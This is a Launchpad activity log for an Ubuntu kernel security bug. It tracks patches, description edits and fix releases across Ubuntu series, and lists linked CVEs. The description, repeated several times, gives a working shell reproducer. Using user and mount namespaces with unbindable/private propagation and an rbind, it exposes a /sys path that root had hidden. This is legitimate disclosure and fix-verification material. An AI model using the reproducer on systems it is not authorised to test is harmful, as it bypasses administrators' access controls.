2018-08-27 06:06:22 |
Stéphane Graber |
bug |
|
|
added bug |
2018-08-27 06:06:37 |
Stéphane Graber |
bug |
|
|
added subscriber Jonathan Calmels |
2018-08-27 06:06:45 |
Stéphane Graber |
bug |
|
|
added subscriber Christian Brauner |
2018-08-27 06:07:12 |
Stéphane Graber |
bug |
|
|
added subscriber Aleksa Sarai |
2018-08-27 06:11:34 |
Stéphane Graber |
bug |
|
|
added subscriber Eric W. Biederman |
2018-08-27 14:36:34 |
Stéphane Graber |
bug |
|
|
added subscriber Tyler Hicks |
2018-08-27 14:36:41 |
Stéphane Graber |
bug |
|
|
added subscriber Seth Forshee |
2018-08-27 22:44:16 |
Aleksa Sarai |
attachment added |
|
0001-fs-disallow-rbind-if-mount-has-MS_LOCKED-MS_UNBINDAB.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5181441/+files/0001-fs-disallow-rbind-if-mount-has-MS_LOCKED-MS_UNBINDAB.patch |
|
2018-08-28 15:29:30 |
Aleksa Sarai |
attachment added |
|
0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5181770/+files/0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch |
|
2018-08-28 15:29:39 |
Aleksa Sarai |
attachment removed |
0001-fs-disallow-rbind-if-mount-has-MS_LOCKED-MS_UNBINDAB.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5181441/+files/0001-fs-disallow-rbind-if-mount-has-MS_LOCKED-MS_UNBINDAB.patch |
|
|
2018-10-12 16:07:29 |
Aleksa Sarai |
attachment added |
|
0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5200460/+files/0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch |
|
2018-10-12 16:07:59 |
Aleksa Sarai |
attachment removed |
0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5181770/+files/0001-fs-disallow-rbind-if-mount-has-an-MS_UNBINDABLE-chil.patch |
|
|
2018-10-18 20:11:45 |
Christian Brauner |
bug |
|
|
added subscriber Serge Hallyn |
2018-10-25 20:13:54 |
Eric W. Biederman |
attachment added |
|
0001-mount-Don-t-allow-MS_UNBINDABLE-on-locked-mounts.patch https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+attachment/5205601/+files/0001-mount-Don-t-allow-MS_UNBINDABLE-on-locked-mounts.patch |
|
2018-11-13 06:46:30 |
Tyler Hicks |
description |
Jonathan Calmels from NVIDIA reported that he's able to bypass the mount visibility security check in place in the Linux kernel by using a combination of the unbindable property along with the private mount propagation option to allow a unprivileged user to see a path which was purposefully hidden by the root user.
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@castiana:~$ unshare -U -m -r
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/device as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual |
[Impact]
Jonathan Calmels from NVIDIA reported that he's able to bypass the mount visibility security check in place in the Linux kernel by using a combination of the unbindable property along with the private mount propagation option to allow a unprivileged user to see a path which was purposefully hidden by the root user.
[Test Case]
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@castiana:~$ unshare -U -m -r
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/device as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
[Regression Potential]
Low. The fixes are relatively simple. Regressions would most likely be specific to software utilizing mount namespaces which is a small (but often important) portion of the Ubuntu archive. |
|
2018-11-13 06:47:09 |
Tyler Hicks |
description |
[Impact]
Jonathan Calmels from NVIDIA reported that he's able to bypass the mount visibility security check in place in the Linux kernel by using a combination of the unbindable property along with the private mount propagation option to allow a unprivileged user to see a path which was purposefully hidden by the root user.
[Test Case]
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@castiana:~$ unshare -U -m -r
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/device as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
[Regression Potential]
Low. The fixes are relatively simple. Regressions would most likely be specific to software utilizing mount namespaces which is a small (but often important) portion of the Ubuntu archive. |
[Impact]
Jonathan Calmels from NVIDIA reported that he's able to bypass the mount visibility security check in place in the Linux kernel by using a combination of the unbindable property along with the private mount propagation option to allow a unprivileged user to see a path which was purposefully hidden by the root user.
[Test Case]
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@castiana:~$ unshare -U -m -r
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/device as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
[Regression Potential]
Low. The fixes are relatively simple. Regressions would most likely be specific to software utilizing user namespaces + mount propagation which is a small (but often important) portion of the Ubuntu archive. |
|
2018-11-13 07:17:41 |
Tyler Hicks |
information type |
Private Security |
Public Security |
|
2018-11-13 08:20:15 |
Ubuntu Foundations Team Bug Bot |
tags |
|
patch |
|
2018-11-13 08:20:15 |
Ubuntu Foundations Team Bug Bot |
bug |
|
|
added subscriber Joseph Salisbury |
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Disco |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Disco) |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Trusty |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Trusty) |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Xenial |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Xenial) |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Cosmic |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Cosmic) |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
nominated for series |
|
Ubuntu Bionic |
|
2018-11-13 15:56:07 |
Thadeu Lima de Souza Cascardo |
bug task added |
|
linux (Ubuntu Bionic) |
|
2018-11-13 15:56:18 |
Thadeu Lima de Souza Cascardo |
linux (Ubuntu Trusty): status |
New |
Fix Committed |
|
2018-11-13 22:00:13 |
Khaled El Mously |
linux (Ubuntu Xenial): status |
New |
Fix Committed |
|
2018-11-14 11:14:25 |
Thadeu Lima de Souza Cascardo |
linux (Ubuntu Cosmic): status |
New |
Fix Committed |
|
2018-11-14 11:14:28 |
Thadeu Lima de Souza Cascardo |
linux (Ubuntu Disco): status |
Triaged |
Fix Committed |
|
2018-11-14 11:14:32 |
Thadeu Lima de Souza Cascardo |
linux (Ubuntu Bionic): status |
New |
Fix Committed |
|
2018-11-15 11:04:21 |
Brad Figg |
tags |
patch |
patch verification-needed-cosmic |
|
2018-11-16 16:36:33 |
Brad Figg |
tags |
patch verification-needed-cosmic |
patch verification-needed-cosmic verification-needed-xenial |
|
2018-11-16 16:38:28 |
Brad Figg |
tags |
patch verification-needed-cosmic verification-needed-xenial |
patch verification-needed-cosmic verification-needed-trusty verification-needed-xenial |
|
2018-11-16 18:15:07 |
Brad Figg |
tags |
patch verification-needed-cosmic verification-needed-trusty verification-needed-xenial |
patch verification-needed-bionic verification-needed-cosmic verification-needed-trusty verification-needed-xenial |
|
2018-11-21 03:38:39 |
Christian Brauner |
tags |
patch verification-needed-bionic verification-needed-cosmic verification-needed-trusty verification-needed-xenial |
patch verification-done-bionic verification-done-cosmic verification-done-trusty verification-done-xenial |
|
2018-12-03 08:46:31 |
Launchpad Janitor |
linux (Ubuntu Trusty): status |
Fix Committed |
Fix Released |
|
2018-12-03 08:49:32 |
Launchpad Janitor |
linux (Ubuntu Cosmic): status |
Fix Committed |
Fix Released |
|
2018-12-03 08:49:32 |
Launchpad Janitor |
cve linked |
|
2018-18653 |
|
2018-12-03 08:49:32 |
Launchpad Janitor |
cve linked |
|
2018-18955 |
|
2018-12-03 08:49:32 |
Launchpad Janitor |
cve linked |
|
2018-6559 |
|
2018-12-03 14:01:15 |
Launchpad Janitor |
linux (Ubuntu Bionic): status |
Fix Committed |
Fix Released |
|
2018-12-03 14:59:47 |
Launchpad Janitor |
linux (Ubuntu Xenial): status |
Fix Committed |
Fix Released |
|
2019-02-04 14:46:37 |
Launchpad Janitor |
linux (Ubuntu Disco): status |
Fix Committed |
Fix Released |
|
2019-07-24 20:23:42 |
Brad Figg |
tags |
patch verification-done-bionic verification-done-cosmic verification-done-trusty verification-done-xenial |
cscc patch verification-done-bionic verification-done-cosmic verification-done-trusty verification-done-xenial |
|